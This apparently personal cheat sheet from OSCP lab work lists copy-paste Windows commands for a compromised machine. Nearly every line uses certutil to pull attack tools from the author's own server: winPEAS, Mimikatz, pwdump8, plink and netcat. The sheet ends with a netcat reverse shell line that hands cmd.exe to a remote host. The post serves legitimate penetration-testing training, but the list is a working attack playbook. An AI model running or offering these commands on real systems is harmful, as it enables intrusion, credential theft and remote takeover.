Windows files
home: Hacking
These are the commands I always copy paste while working through the OSCP lab.
I host the files using python3 -m simple.httpserver 80
certutil -urlcache -split -f http://10.10.14.23/privesc/win/winpeas64.exe win.exe
certutil -urlcache -split -f http://192.168.119.176/shell/nc.exe
certutil -urlcache -split -f http://192.168.119.176/privesc/win/winpeas64.exe win.exe
certutil -urlcache -split -f http://192.168.119.176/privesc/win/winpeas32.exe win.exe
certutil -urlcache -split -f http://192.168.119.176/privesc/win/winpeas.bat win.bat
certutil -urlcache -split -f http://192.168.119.176/post/Invoke-Mimikatz.ps1
certutil -urlcache -split -f http://192.168.119.176/post/mimikatz64.exe mimi.exe
certutil -urlcache -split -f http://192.168.119.176/post/mimikatz32.exe mimi.exe
certutil -urlcache -split -f http://192.168.119.176/post/pwdump8.exe pwdump.exe
certutil -urlcache -split -f http://192.168.119.176/post/plink64.exe plink.exe
certutil -urlcache -split -f http://192.168.119.176/privesc/win/sysinternal/accesschk.exe
certutil -urlcache -split -f http://192.168.119.176/privesc/win/sysinternal/accesschk64.exe
start /b nc.exe 192.168.119.176 443 -e cmd.exe
This actually leads me to create this tool called the-c0d3r/htb-scripts/srvfile to automate this process of editing the IP address every single time I want to copy paste to my remote terminal to have the files downloaded to the compromised machine.